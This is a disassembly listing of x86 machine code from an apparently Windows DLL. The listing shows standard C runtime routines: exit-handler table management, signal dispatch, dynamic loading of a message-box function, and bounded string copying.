10008b1c: c3 ret 10008b1d: 8b 65 e8 mov esp,DWORD PTR [ebp-0x18] 10008b20: c7 45 fc fe ff ff ff mov DWORD PTR [ebp-0x4],0xfffffffe 10008b27: 33 c0 xor eax,eax 10008b29: 8b 4d f0 mov ecx,DWORD PTR [ebp-0x10] 10008b2c: 64 89 0d 00 00 00 00 mov DWORD PTR fs:0x0,ecx 10008b33: 59 pop ecx 10008b34: 5f pop edi 10008b35: 5e pop esi 10008b36: 5b pop ebx 10008b37: 8b e5 mov esp,ebp 10008b39: 5d pop ebp 10008b3a: c3 ret 10008b3b: 51 push ecx 10008b3c: 53 push ebx 10008b3d: 55 push ebp 10008b3e: 56 push esi 10008b3f: 57 push edi 10008b40: ff 35 c8 5d 01 10 push DWORD PTR ds:0x10015dc8 10008b46: e8 c3 d5 ff ff call 0x1000610e 10008b4b: ff 35 c4 5d 01 10 push DWORD PTR ds:0x10015dc4 10008b51: 8b f0 mov esi,eax 10008b53: 89 74 24 18 mov DWORD PTR [esp+0x18],esi 10008b57: e8 b2 d5 ff ff call 0x1000610e 10008b5c: 8b f8 mov edi,eax 10008b5e: 3b fe cmp edi,esi 10008b60: 59 pop ecx 10008b61: 59 pop ecx 10008b62: 0f 82 84 00 00 00 jb 0x10008bec 10008b68: 8b df mov ebx,edi 10008b6a: 2b de sub ebx,esi 10008b6c: 8d 6b 04 lea ebp,[ebx+0x4] 10008b6f: 83 fd 04 cmp ebp,0x4 10008b72: 72 78 jb 0x10008bec 10008b74: 56 push esi 10008b75: e8 c5 39 00 00 call 0x1000c53f 10008b7a: 8b f0 mov esi,eax 10008b7c: 3b f5 cmp esi,ebp 10008b7e: 59 pop ecx 10008b7f: 73 4a jae 0x10008bcb 10008b81: b8 00 08 00 00 mov eax,0x800 10008b86: 3b f0 cmp esi,eax 10008b88: 73 02 jae 0x10008b8c 10008b8a: 8b c6 mov eax,esi 10008b8c: 03 c6 add eax,esi 10008b8e: 3b c6 cmp eax,esi 10008b90: 72 10 jb 0x10008ba2 10008b92: 50 push eax 10008b93: ff 74 24 14 push DWORD PTR [esp+0x14] 10008b97: e8 3c db ff ff call 0x100066d8 10008b9c: 85 c0 test eax,eax 10008b9e: 59 pop ecx 10008b9f: 59 pop ecx 10008ba0: 75 17 jne 0x10008bb9 10008ba2: 8d 46 10 lea eax,[esi+0x10] 10008ba5: 3b c6 cmp eax,esi 10008ba7: 72 43 jb 0x10008bec 10008ba9: 50 push eax 10008baa: ff 74 24 14 push DWORD PTR [esp+0x14] 10008bae: e8 25 db ff ff call 0x100066d8 10008bb3: 85 c0 test eax,eax 10008bb5: 59 pop ecx 10008bb6: 59 pop ecx 10008bb7: 74 33 je 0x10008bec 10008bb9: c1 fb 02 sar ebx,0x2 10008bbc: 50 push eax 10008bbd: 8d 3c 98 lea edi,[eax+ebx*4] 10008bc0: e8 d2 d4 ff ff call 0x10006097 10008bc5: 59 pop ecx 10008bc6: a3 c8 5d 01 10 mov ds:0x10015dc8,eax 10008bcb: ff 74 24 18 push DWORD PTR [esp+0x18] 10008bcf: e8 c3 d4 ff ff call 0x10006097 10008bd4: 89 07 mov DWORD PTR [edi],eax 10008bd6: 83 c7 04 add edi,0x4 10008bd9: 57 push edi 10008bda: e8 b8 d4 ff ff call 0x10006097 10008bdf: 59 pop ecx 10008be0: a3 c4 5d 01 10 mov ds:0x10015dc4,eax 10008be5: 8b 44 24 1c mov eax,DWORD PTR [esp+0x1c] 10008be9: 59 pop ecx 10008bea: eb 02 jmp 0x10008bee 10008bec: 33 c0 xor eax,eax 10008bee: 5f pop edi 10008bef: 5e pop esi 10008bf0: 5d pop ebp 10008bf1: 5b pop ebx 10008bf2: 59 pop ecx 10008bf3: c3 ret 10008bf4: 56 push esi 10008bf5: 6a 04 push 0x4 10008bf7: 6a 20 push 0x20 10008bf9: e8 92 da ff ff call 0x10006690 10008bfe: 8b f0 mov esi,eax 10008c00: 56 push esi 10008c01: e8 91 d4 ff ff call 0x10006097 10008c06: 83 c4 0c add esp,0xc 10008c09: 85 f6 test esi,esi 10008c0b: a3 c8 5d 01 10 mov ds:0x10015dc8,eax 10008c10: a3 c4 5d 01 10 mov ds:0x10015dc4,eax 10008c15: 75 05 jne 0x10008c1c 10008c17: 6a 18 push 0x18 10008c19: 58 pop eax 10008c1a: 5e pop esi 10008c1b: c3 ret 10008c1c: 83 26 00 and DWORD PTR [esi],0x0 10008c1f: 33 c0 xor eax,eax 10008c21: 5e pop esi 10008c22: c3 ret 10008c23: 6a 0c push 0xc 10008c25: 68 88 e5 00 10 push 0x1000e588 10008c2a: e8 f9 cb ff ff call 0x10005828 10008c2f: e8 51 ce ff ff call 0x10005a85 10008c34: 83 65 fc 00 and DWORD PTR [ebp-0x4],0x0 10008c38: ff 75 08 push DWORD PTR [ebp+0x8] 10008c3b: e8 fb fe ff ff call 0x10008b3b 10008c40: 59 pop ecx 10008c41: 89 45 e4 mov DWORD PTR [ebp-0x1c],eax 10008c44: c7 45 fc fe ff ff ff mov DWORD PTR [ebp-0x4],0xfffffffe 10008c4b: e8 09 00 00 00 call 0x10008c59 10008c50: 8b 45 e4 mov eax,DWORD PTR [ebp-0x1c] 10008c53: e8 15 cc ff ff call 0x1000586d 10008c58: c3 ret 10008c59: e8 30 ce ff ff call 0x10005a8e 10008c5e: c3 ret 10008c5f: ff 74 24 04 push DWORD PTR [esp+0x4] 10008c63: e8 bb ff ff ff call 0x10008c23 10008c68: f7 d8 neg eax 10008c6a: 1b c0 sbb eax,eax 10008c6c: f7 d8 neg eax 10008c6e: 59 pop ecx 10008c6f: 48 dec eax 10008c70: c3 ret 10008c71: 6a 08 push 0x8 10008c73: 68 a8 e5 00 10 push 0x1000e5a8 10008c78: e8 ab cb ff ff call 0x10005828 10008c7d: e8 a8 d6 ff ff call 0x1000632a 10008c82: 8b 40 78 mov eax,DWORD PTR [eax+0x78] 10008c85: 85 c0 test eax,eax 10008c87: 74 16 je 0x10008c9f 10008c89: 83 65 fc 00 and DWORD PTR [ebp-0x4],0x0 10008c8d: ff d0 call eax 10008c8f: eb 07 jmp 0x10008c98 10008c91: 33 c0 xor eax,eax 10008c93: 40 inc eax 10008c94: c3 ret 10008c95: 8b 65 e8 mov esp,DWORD PTR [ebp-0x18] 10008c98: c7 45 fc fe ff ff ff mov DWORD PTR [ebp-0x4],0xfffffffe 10008c9f: e8 3e 39 00 00 call 0x1000c5e2 10008ca4: e8 c4 cb ff ff call 0x1000586d 10008ca9: c3 ret 10008caa: 68 71 8c 00 10 push 0x10008c71 10008caf: e8 e3 d3 ff ff call 0x10006097 10008cb4: 59 pop ecx 10008cb5: a3 a0 5b 01 10 mov ds:0x10015ba0,eax 10008cba: c3 ret 10008cbb: 8b 44 24 04 mov eax,DWORD PTR [esp+0x4] 10008cbf: a3 a4 5b 01 10 mov ds:0x10015ba4,eax 10008cc4: a3 a8 5b 01 10 mov ds:0x10015ba8,eax 10008cc9: a3 ac 5b 01 10 mov ds:0x10015bac,eax 10008cce: a3 b0 5b 01 10 mov ds:0x10015bb0,eax 10008cd3: c3 ret 10008cd4: 8b 44 24 04 mov eax,DWORD PTR [esp+0x4] 10008cd8: 8b 0d 64 04 01 10 mov ecx,DWORD PTR ds:0x10010464 10008cde: 56 push esi 10008cdf: 39 50 04 cmp DWORD PTR [eax+0x4],edx 10008ce2: 74 10 je 0x10008cf4 10008ce4: 8b f1 mov esi,ecx 10008ce6: 6b f6 0c imul esi,esi,0xc 10008ce9: 03 74 24 08 add esi,DWORD PTR [esp+0x8] 10008ced: 83 c0 0c add eax,0xc 10008cf0: 3b c6 cmp eax,esi 10008cf2: 72 eb jb 0x10008cdf 10008cf4: 6b c9 0c imul ecx,ecx,0xc 10008cf7: 03 4c 24 08 add ecx,DWORD PTR [esp+0x8] 10008cfb: 5e pop esi 10008cfc: 3b c1 cmp eax,ecx 10008cfe: 73 05 jae 0x10008d05 10008d00: 39 50 04 cmp DWORD PTR [eax+0x4],edx 10008d03: 74 02 je 0x10008d07 10008d05: 33 c0 xor eax,eax 10008d07: c3 ret 10008d08: ff 35 ac 5b 01 10 push DWORD PTR ds:0x10015bac 10008d0e: e8 fb d3 ff ff call 0x1000610e 10008d13: 59 pop ecx 10008d14: c3 ret 10008d15: 6a 20 push 0x20 10008d17: 68 c8 e5 00 10 push 0x1000e5c8 10008d1c: e8 07 cb ff ff call 0x10005828 10008d21: 33 ff xor edi,edi 10008d23: 89 7d e4 mov DWORD PTR [ebp-0x1c],edi 10008d26: 89 7d d8 mov DWORD PTR [ebp-0x28],edi 10008d29: 8b 5d 08 mov ebx,DWORD PTR [ebp+0x8] 10008d2c: 83 fb 0b cmp ebx,0xb 10008d2f: 7f 4c jg 0x10008d7d 10008d31: 74 15 je 0x10008d48 10008d33: 8b c3 mov eax,ebx 10008d35: 6a 02 push 0x2 10008d37: 59 pop ecx 10008d38: 2b c1 sub eax,ecx 10008d3a: 74 22 je 0x10008d5e 10008d3c: 2b c1 sub eax,ecx 10008d3e: 74 08 je 0x10008d48 10008d40: 2b c1 sub eax,ecx 10008d42: 74 64 je 0x10008da8 10008d44: 2b c1 sub eax,ecx 10008d46: 75 44 jne 0x10008d8c 10008d48: e8 66 d5 ff ff call 0x100062b3 10008d4d: 8b f8 mov edi,eax 10008d4f: 89 7d d8 mov DWORD PTR [ebp-0x28],edi 10008d52: 85 ff test edi,edi 10008d54: 75 14 jne 0x10008d6a 10008d56: 83 c8 ff or eax,0xffffffff 10008d59: e9 61 01 00 00 jmp 0x10008ebf 10008d5e: be a4 5b 01 10 mov esi,0x10015ba4 10008d63: a1 a4 5b 01 10 mov eax,ds:0x10015ba4 10008d68: eb 60 jmp 0x10008dca 10008d6a: ff 77 5c push DWORD PTR [edi+0x5c] 10008d6d: 8b d3 mov edx,ebx 10008d6f: e8 60 ff ff ff call 0x10008cd4 10008d74: 8b f0 mov esi,eax 10008d76: 83 c6 08 add esi,0x8 10008d79: 8b 06 mov eax,DWORD PTR [esi] 10008d7b: eb 5a jmp 0x10008dd7 10008d7d: 8b c3 mov eax,ebx 10008d7f: 83 e8 0f sub eax,0xf 10008d82: 74 3c je 0x10008dc0 10008d84: 83 e8 06 sub eax,0x6 10008d87: 74 2b je 0x10008db4 10008d89: 48 dec eax 10008d8a: 74 1c je 0x10008da8 10008d8c: e8 b5 bc ff ff call 0x10004a46 10008d91: c7 00 16 00 00 00 mov DWORD PTR [eax],0x16 10008d97: 33 c0 xor eax,eax 10008d99: 50 push eax 10008d9a: 50 push eax 10008d9b: 50 push eax 10008d9c: 50 push eax 10008d9d: 50 push eax 10008d9e: e8 d3 ed ff ff call 0x10007b76 10008da3: 83 c4 14 add esp,0x14 10008da6: eb ae jmp 0x10008d56 10008da8: be ac 5b 01 10 mov esi,0x10015bac 10008dad: a1 ac 5b 01 10 mov eax,ds:0x10015bac 10008db2: eb 16 jmp 0x10008dca 10008db4: be a8 5b 01 10 mov esi,0x10015ba8 10008db9: a1 a8 5b 01 10 mov eax,ds:0x10015ba8 10008dbe: eb 0a jmp 0x10008dca 10008dc0: be b0 5b 01 10 mov esi,0x10015bb0 10008dc5: a1 b0 5b 01 10 mov eax,ds:0x10015bb0 10008dca: c7 45 e4 01 00 00 00 mov DWORD PTR [ebp-0x1c],0x1 10008dd1: 50 push eax 10008dd2: e8 37 d3 ff ff call 0x1000610e 10008dd7: 89 45 e0 mov DWORD PTR [ebp-0x20],eax 10008dda: 59 pop ecx 10008ddb: 33 c0 xor eax,eax 10008ddd: 83 7d e0 01 cmp DWORD PTR [ebp-0x20],0x1 10008de1: 0f 84 d8 00 00 00 je 0x10008ebf 10008de7: 39 45 e0 cmp DWORD PTR [ebp-0x20],eax 10008dea: 75 07 jne 0x10008df3 10008dec: 6a 03 push 0x3 10008dee: e8 c3 ce ff ff call 0x10005cb6 10008df3: 39 45 e4 cmp DWORD PTR [ebp-0x1c],eax 10008df6: 74 07 je 0x10008dff 10008df8: 50 push eax 10008df9: e8 fa be ff ff call 0x10004cf8 10008dfe: 59 pop ecx 10008dff: 33 c0 xor eax,eax 10008e01: 89 45 fc mov DWORD PTR [ebp-0x4],eax 10008e04: 83 fb 08 cmp ebx,0x8 10008e07: 74 0a je 0x10008e13 10008e09: 83 fb 0b cmp ebx,0xb 10008e0c: 74 05 je 0x10008e13 10008e0e: 83 fb 04 cmp ebx,0x4 10008e11: 75 1b jne 0x10008e2e 10008e13: 8b 4f 60 mov ecx,DWORD PTR [edi+0x60] 10008e16: 89 4d d4 mov DWORD PTR [ebp-0x2c],ecx 10008e19: 89 47 60 mov DWORD PTR [edi+0x60],eax 10008e1c: 83 fb 08 cmp ebx,0x8 10008e1f: 75 40 jne 0x10008e61 10008e21: 8b 4f 64 mov ecx,DWORD PTR [edi+0x64] 10008e24: 89 4d d0 mov DWORD PTR [ebp-0x30],ecx 10008e27: c7 47 64 8c 00 00 00 mov DWORD PTR [edi+0x64],0x8c 10008e2e: 83 fb 08 cmp ebx,0x8 10008e31: 75 2e jne 0x10008e61 10008e33: 8b 0d 58 04 01 10 mov ecx,DWORD PTR ds:0x10010458 10008e39: 89 4d dc mov DWORD PTR [ebp-0x24],ecx 10008e3c: 8b 0d 5c 04 01 10 mov ecx,DWORD PTR ds:0x1001045c 10008e42: 8b 15 58 04 01 10 mov edx,DWORD PTR ds:0x10010458 10008e48: 03 ca add ecx,edx 10008e4a: 39 4d dc cmp DWORD PTR [ebp-0x24],ecx 10008e4d: 7d 19 jge 0x10008e68 10008e4f: 8b 4d dc mov ecx,DWORD PTR [ebp-0x24] 10008e52: 6b c9 0c imul ecx,ecx,0xc 10008e55: 8b 57 5c mov edx,DWORD PTR [edi+0x5c] 10008e58: 89 44 11 08 mov DWORD PTR [ecx+edx*1+0x8],eax 10008e5c: ff 45 dc inc DWORD PTR [ebp-0x24] 10008e5f: eb db jmp 0x10008e3c 10008e61: e8 9f d2 ff ff call 0x10006105 10008e66: 89 06 mov DWORD PTR [esi],eax 10008e68: c7 45 fc fe ff ff ff mov DWORD PTR [ebp-0x4],0xfffffffe 10008e6f: e8 15 00 00 00 call 0x10008e89 10008e74: 83 fb 08 cmp ebx,0x8 10008e77: 75 1f jne 0x10008e98 10008e79: ff 77 64 push DWORD PTR [edi+0x64] 10008e7c: 53 push ebx 10008e7d: ff 55 e0 call DWORD PTR [ebp-0x20] 10008e80: 59 pop ecx 10008e81: eb 19 jmp 0x10008e9c 10008e83: 8b 5d 08 mov ebx,DWORD PTR [ebp+0x8] 10008e86: 8b 7d d8 mov edi,DWORD PTR [ebp-0x28] 10008e89: 83 7d e4 00 cmp DWORD PTR [ebp-0x1c],0x0 10008e8d: 74 08 je 0x10008e97 10008e8f: 6a 00 push 0x0 10008e91: e8 8a bd ff ff call 0x10004c20 10008e96: 59 pop ecx 10008e97: c3 ret 10008e98: 53 push ebx 10008e99: ff 55 e0 call DWORD PTR [ebp-0x20] 10008e9c: 59 pop ecx 10008e9d: 83 fb 08 cmp ebx,0x8 10008ea0: 74 0a je 0x10008eac 10008ea2: 83 fb 0b cmp ebx,0xb 10008ea5: 74 05 je 0x10008eac 10008ea7: 83 fb 04 cmp ebx,0x4 10008eaa: 75 11 jne 0x10008ebd 10008eac: 8b 45 d4 mov eax,DWORD PTR [ebp-0x2c] 10008eaf: 89 47 60 mov DWORD PTR [edi+0x60],eax 10008eb2: 83 fb 08 cmp ebx,0x8 10008eb5: 75 06 jne 0x10008ebd 10008eb7: 8b 45 d0 mov eax,DWORD PTR [ebp-0x30] 10008eba: 89 47 64 mov DWORD PTR [edi+0x64],eax 10008ebd: 33 c0 xor eax,eax 10008ebf: e8 a9 c9 ff ff call 0x1000586d 10008ec4: c3 ret 10008ec5: 8b 44 24 04 mov eax,DWORD PTR [esp+0x4] 10008ec9: a3 b8 5b 01 10 mov ds:0x10015bb8,eax 10008ece: c3 ret 10008ecf: 8b 44 24 04 mov eax,DWORD PTR [esp+0x4] 10008ed3: a3 c4 5b 01 10 mov ds:0x10015bc4,eax 10008ed8: c3 ret 10008ed9: 55 push ebp 10008eda: 8b ec mov ebp,esp 10008edc: 83 ec 20 sub esp,0x20 10008edf: 53 push ebx 10008ee0: 56 push esi 10008ee1: 57 push edi 10008ee2: e8 1e d2 ff ff call 0x10006105 10008ee7: 33 db xor ebx,ebx 10008ee9: 39 1d c8 5b 01 10 cmp DWORD PTR ds:0x10015bc8,ebx 10008eef: 89 45 f8 mov DWORD PTR [ebp-0x8],eax 10008ef2: 89 5d fc mov DWORD PTR [ebp-0x4],ebx 10008ef5: 89 5d f4 mov DWORD PTR [ebp-0xc],ebx 10008ef8: 89 5d f0 mov DWORD PTR [ebp-0x10],ebx 10008efb: 0f 85 ae 00 00 00 jne 0x10008faf 10008f01: 68 a4 d9 00 10 push 0x1000d9a4 10008f06: ff 15 f4 d0 00 10 call DWORD PTR ds:0x1000d0f4 10008f0c: 8b f8 mov edi,eax 10008f0e: 3b fb cmp edi,ebx 10008f10: 0f 84 79 01 00 00 je 0x1000908f 10008f16: 8b 35 4c d0 00 10 mov esi,DWORD PTR ds:0x1000d04c 10008f1c: 68 98 d9 00 10 push 0x1000d998 10008f21: 57 push edi 10008f22: ff d6 call esi 10008f24: 3b c3 cmp eax,ebx 10008f26: 0f 84 63 01 00 00 je 0x1000908f 10008f2c: 50 push eax 10008f2d: e8 65 d1 ff ff call 0x10006097 10008f32: c7 04 24 88 d9 00 10 mov DWORD PTR [esp],0x1000d988 10008f39: 57 push edi 10008f3a: a3 c8 5b 01 10 mov ds:0x10015bc8,eax 10008f3f: ff d6 call esi 10008f41: 50 push eax 10008f42: e8 50 d1 ff ff call 0x10006097 10008f47: c7 04 24 74 d9 00 10 mov DWORD PTR [esp],0x1000d974 10008f4e: 57 push edi 10008f4f: a3 cc 5b 01 10 mov ds:0x10015bcc,eax 10008f54: ff d6 call esi 10008f56: 50 push eax 10008f57: e8 3b d1 ff ff call 0x10006097 10008f5c: a3 d0 5b 01 10 mov ds:0x10015bd0,eax 10008f61: 8d 45 f4 lea eax,[ebp-0xc] 10008f64: 50 push eax 10008f65: e8 65 cb ff ff call 0x10005acf 10008f6a: 85 c0 test eax,eax 10008f6c: 59 pop ecx 10008f6d: 59 pop ecx 10008f6e: 74 0d je 0x10008f7d 10008f70: 53 push ebx 10008f71: 53 push ebx 10008f72: 53 push ebx 10008f73: 53 push ebx 10008f74: 53 push ebx 10008f75: e8 00 eb ff ff call 0x10007a7a 10008f7a: 83 c4 14 add esp,0x14 10008f7d: 83 7d f4 02 cmp DWORD PTR [ebp-0xc],0x2 10008f81: 75 2c jne 0x10008faf 10008f83: 68 58 d9 00 10 push 0x1000d958 10008f88: 57 push edi 10008f89: ff d6 call esi 10008f8b: 50 push eax 10008f8c: e8 06 d1 ff ff call 0x10006097 10008f91: 3b c3 cmp eax,ebx 10008f93: 59 pop ecx 10008f94: a3 d8 5b 01 10 mov ds:0x10015bd8,eax 10008f99: 74 14 je 0x10008faf 10008f9b: 68 40 d9 00 10 push 0x1000d940 10008fa0: 57 push edi 10008fa1: ff d6 call esi 10008fa3: 50 push eax 10008fa4: e8 ee d0 ff ff call 0x10006097 10008fa9: 59 pop ecx 10008faa: a3 d4 5b 01 10 mov ds:0x10015bd4,eax 10008faf: a1 d4 5b 01 10 mov eax,ds:0x10015bd4 10008fb4: 8b 4d f8 mov ecx,DWORD PTR [ebp-0x8] 10008fb7: 3b c1 cmp eax,ecx 10008fb9: 74 79 je 0x10009034 10008fbb: 39 0d d8 5b 01 10 cmp DWORD PTR ds:0x10015bd8,ecx 10008fc1: 74 71 je 0x10009034 10008fc3: 50 push eax 10008fc4: e8 45 d1 ff ff call 0x1000610e 10008fc9: ff 35 d8 5b 01 10 push DWORD PTR ds:0x10015bd8 10008fcf: 8b f0 mov esi,eax 10008fd1: e8 38 d1 ff ff call 0x1000610e 10008fd6: 3b f3 cmp esi,ebx 10008fd8: 59 pop ecx 10008fd9: 59 pop ecx 10008fda: 8b f8 mov edi,eax 10008fdc: 74 56 je 0x10009034 10008fde: 3b fb cmp edi,ebx 10008fe0: 74 52 je 0x10009034 10008fe2: ff d6 call esi 10008fe4: 3b c3 cmp eax,ebx 10008fe6: 74 19 je 0x10009001 10008fe8: 8d 4d ec lea ecx,[ebp-0x14] 10008feb: 51 push ecx 10008fec: 6a 0c push 0xc 10008fee: 8d 4d e0 lea ecx,[ebp-0x20] 10008ff1: 51 push ecx 10008ff2: 6a 01 push 0x1 10008ff4: 50 push eax 10008ff5: ff d7 call edi 10008ff7: 85 c0 test eax,eax 10008ff9: 74 06 je 0x10009001 10008ffb: f6 45 e8 01 test BYTE PTR [ebp-0x18],0x1 10008fff: 75 33 jne 0x10009034 10009001: 8d 45 f0 lea eax,[ebp-0x10] 10009004: 50 push eax 10009005: e8 fc ca ff ff call 0x10005b06 1000900a: 85 c0 test eax,eax 1000900c: 59 pop ecx 1000900d: 74 0d je 0x1000901c 1000900f: 53 push ebx 10009010: 53 push ebx 10009011: 53 push ebx 10009012: 53 push ebx 10009013: 53 push ebx 10009014: e8 61 ea ff ff call 0x10007a7a 10009019: 83 c4 14 add esp,0x14 1000901c: 83 7d f0 04 cmp DWORD PTR [ebp-0x10],0x4 10009020: 72 09 jb 0x1000902b 10009022: 81 4d 10 00 00 20 00 or DWORD PTR [ebp+0x10],0x200000 10009029: eb 44 jmp 0x1000906f 1000902b: 81 4d 10 00 00 04 00 or DWORD PTR [ebp+0x10],0x40000 10009032: eb 3b jmp 0x1000906f 10009034: a1 cc 5b 01 10 mov eax,ds:0x10015bcc 10009039: 3b 45 f8 cmp eax,DWORD PTR [ebp-0x8] 1000903c: 74 31 je 0x1000906f 1000903e: 50 push eax 1000903f: e8 ca d0 ff ff call 0x1000610e 10009044: 3b c3 cmp eax,ebx 10009046: 59 pop ecx 10009047: 74 26 je 0x1000906f 10009049: ff d0 call eax 1000904b: 3b c3 cmp eax,ebx 1000904d: 89 45 fc mov DWORD PTR [ebp-0x4],eax 10009050: 74 1d je 0x1000906f 10009052: a1 d0 5b 01 10 mov eax,ds:0x10015bd0 10009057: 3b 45 f8 cmp eax,DWORD PTR [ebp-0x8] 1000905a: 74 13 je 0x1000906f 1000905c: 50 push eax 1000905d: e8 ac d0 ff ff call 0x1000610e 10009062: 3b c3 cmp eax,ebx 10009064: 59 pop ecx 10009065: 74 08 je 0x1000906f 10009067: ff 75 fc push DWORD PTR [ebp-0x4] 1000906a: ff d0 call eax 1000906c: 89 45 fc mov DWORD PTR [ebp-0x4],eax 1000906f: ff 35 c8 5b 01 10 push DWORD PTR ds:0x10015bc8 10009075: e8 94 d0 ff ff call 0x1000610e 1000907a: 3b c3 cmp eax,ebx 1000907c: 59 pop ecx 1000907d: 74 10 je 0x1000908f 1000907f: ff 75 10 push DWORD PTR [ebp+0x10] 10009082: ff 75 0c push DWORD PTR [ebp+0xc] 10009085: ff 75 08 push DWORD PTR [ebp+0x8] 10009088: ff 75 fc push DWORD PTR [ebp-0x4] 1000908b: ff d0 call eax 1000908d: eb 02 jmp 0x10009091 1000908f: 33 c0 xor eax,eax 10009091: 5f pop edi 10009092: 5e pop esi 10009093: 5b pop ebx 10009094: c9 leave 10009095: c3 ret 10009096: 8b 44 24 04 mov eax,DWORD PTR [esp+0x4] 1000909a: 53 push ebx 1000909b: 33 db xor ebx,ebx 1000909d: 3b c3 cmp eax,ebx 1000909f: 56 push esi 100090a0: 57 push edi 100090a1: 74 08 je 0x100090ab 100090a3: 8b 7c 24 14 mov edi,DWORD PTR [esp+0x14] 100090a7: 3b fb cmp edi,ebx 100090a9: 77 1b ja 0x100090c6 100090ab: e8 96 b9 ff ff call 0x10004a46 100090b0: 6a 16 push 0x16 100090b2: 5e pop esi 100090b3: 89 30 mov DWORD PTR [eax],esi 100090b5: 53 push ebx 100090b6: 53 push ebx 100090b7: 53 push ebx 100090b8: 53 push ebx 100090b9: 53 push ebx 100090ba: e8 b7 ea ff ff call 0x10007b76 100090bf: 83 c4 14 add esp,0x14 100090c2: 8b c6 mov eax,esi 100090c4: eb 3d jmp 0x10009103 100090c6: 8b 74 24 18 mov esi,DWORD PTR [esp+0x18] 100090ca: 3b f3 cmp esi,ebx 100090cc: 75 04 jne 0x100090d2 100090ce: 88 18 mov BYTE PTR [eax],bl 100090d0: eb d9 jmp 0x100090ab 100090d2: 8b d0 mov edx,eax 100090d4: 38 1a cmp BYTE PTR [edx],bl 100090d6: 74 04 je 0x100090dc 100090d8: 42 inc edx 100090d9: 4f dec edi 100090da: 75 f8 jne 0x100090d4 100090dc: 3b fb cmp edi,ebx 100090de: 74 ee je 0x100090ce 100090e0: 8a 0e mov cl,BYTE PTR [esi] 100090e2: 88 0a mov BYTE PTR [edx],cl 100090e4: 42 inc edx 100090e5: 46 inc esi 100090e6: 3a cb cmp cl,bl 100090e8: 74 03 je 0x100090ed 100090ea: 4f dec edi 100090eb: 75 f3 jne 0x100090e0 100090ed: 3b fb cmp edi,ebx 100090ef: 75 10 jne 0x10009101 100090f1: 88 18 mov BYTE PTR [eax],bl 100090f3: e8 4e b9 ff ff call 0x10004a46 100090f8: 6a 22 push 0x22 100090fa: 59 pop ecx 100090fb: 89 08 mov DWORD PTR [eax],ecx 100090fd: 8b f1 mov esi,ecx 100090ff: eb b4 jmp 0x100090b5 10009101: 33 c0 xor eax,eax 10009103: 5f pop edi 10009104: 5e pop esi 10009105: 5b pop ebx 10009106: c3 ret 10009107: 55 push ebp 10009108: 8b ec mov ebp,esp 1000910a: 53 push ebx 1000910b: 56 push esi 1000910c: 8b 75 08 mov esi,DWORD PTR [ebp+0x8] 1000910f: 33 db xor ebx,ebx 10009111: 39 5d 14 cmp DWORD PTR [ebp+0x14],ebx 10009114: 57 push edi 10009115: 75 10 jne 0x10009127 10009117: 3b f3 cmp esi,ebx 10009119: 75 10 jne 0x1000912b 1000911b: 39 5d 0c cmp DWORD PTR [ebp+0xc],ebx 1000911e: 75 12 jne 0x10009132 10009120: 33 c0 xor eax,eax 10009122: 5f pop edi 10009123: 5e pop esi 10009124: 5b pop ebx 10009125: 5d pop ebp 10009126: c3 ret 10009127: 3b f3 cmp esi,ebx 10009129: 74 07 je 0x10009132 1000912b: 8b 7d 0c mov edi,DWORD PTR [ebp+0xc] 1000912e: 3b fb cmp edi,ebx 10009130: 77 1b ja 0x1000914d 10009132: e8 0f b9 ff ff call 0x10004a46 10009137: 6a 16 push 0x16 10009139: 5e pop esi 1000913a: 89 30 mov DWORD PTR [eax],esi 1000913c: 53 push ebx 1000913d: 53 push ebx 1000913e: 53 push ebx 1000913f: 53 push ebx 10009140: 53 push ebx 10009141: e8 30 ea ff ff call 0x10007b76 10009146: 83 c4 14 add esp,0x14 10009149: 8b c6 mov eax,esi 1000914b: eb d5 jmp 0x10009122 1000914d: 39 5d 14 cmp DWORD PTR [ebp+0x14],ebx 10009150: 75 04 jne 0x10009156 10009152: 88 1e mov BYTE PTR [esi],bl 10009154: eb ca jmp 0x10009120 10009156: 8b 55 10 mov edx,DWORD PTR [ebp+0x10] 10009159: 3b d3 cmp edx,ebx 1000915b: 75 04 jne 0x10009161 1000915d: 88 1e mov BYTE PTR [esi],bl 1000915f: eb d1 jmp 0x10009132 10009161: 83 7d 14 ff cmp DWORD PTR [ebp+0x14],0xffffffff 10009165: 8b c6 mov eax,esi 10009167: 75 0f jne 0x10009178 10009169: 8a 0a mov cl,BYTE PTR [edx] 1000916b: 88 08 mov BYTE PTR [eax],cl 1000916d: 40 inc eax 1000916e: 42 inc edx 1000916f: 3a cb cmp cl,bl 10009171: 74 1e je 0x10009191 10009173: 4f dec edi 10009174: 75 f3 jne 0x10009169 10009176: eb 19 jmp 0x10009191 10009178: 8a 0a mov cl,BYTE PTR [edx] 1000917a: 88 08 mov BYTE PTR [eax],cl 1000917c: 40 inc eax 1000917d: 42 inc edx 1000917e: 3a cb cmp cl,bl 10009180: 74 08 je 0x1000918a 10009182: 4f dec edi 10009183: 74 05 je 0x1000918a 10009185: ff 4d 14 dec DWORD PTR [ebp+0x14] 10009188: 75 ee jne 0x10009178 1000918a: 39 5d 14 cmp DWORD PTR [ebp+0x14],ebx 1000918d: 75 02 jne 0x10009191 1000918f: 88 18 mov BYTE PTR [eax],bl 10009191: 3b fb cmp edi,ebx 10009193: 75 8b jne 0x10009120 10009195: 83 7d 14 ff cmp DWORD PTR [ebp+0x14],0xffffffff 10009199: 75 0f jne 0x100091aa 1000919b: 8b 45 0c mov eax,DWORD PTR [ebp+0xc] 1000919e: 6a 50 push 0x50 100091a0: 88 5c 06 ff mov BYTE PTR [esi+eax*1-0x1],bl 100091a4: 58 pop eax 100091a5: e9 78 ff ff ff jmp 0x10009122 100091aa: 88 1e mov BYTE PTR [esi],bl 100091ac: e8 95 b8 ff ff call 0x10004a46 100091b1: 6a 22 push 0x22 100091b3: 59 pop ecx 100091b4: 89 08 mov DWORD PTR [eax],ecx 100091b6: 8b f1 mov esi,ecx 100091b8: eb 82 jmp 0x1000913c 100091ba: 8b 4c 24 04 mov ecx,DWORD PTR [esp+0x4] 100091be: 56 push esi 100091bf: 33 f6 xor esi,esi 100091c1: 3b ce cmp ecx,esi 100091c3: 7c 1e jl 0x100091e3 100091c5: 83 f9 02 cmp ecx,0x2 100091c8: 7e 0c jle 0x100091d6 100091ca: 83 f9 03 cmp ecx,0x3 100091cd: 75 14 jne 0x100091e3 100091cf: a1 44 52 01 10 mov eax,ds:0x10015244 100091d4: 5e pop esi 100091d5: c3 ret 100091d6: a1 44 52 01 10 mov eax,ds:0x10015244 100091db: 89 0d 44 52 01 10 mov DWORD PTR ds:0x10015244,ecx 100091e1: 5e pop esi 100091e2: c3 ret 100091e3: e8 5e b8 ff ff call 0x10004a46 100091e8: 56 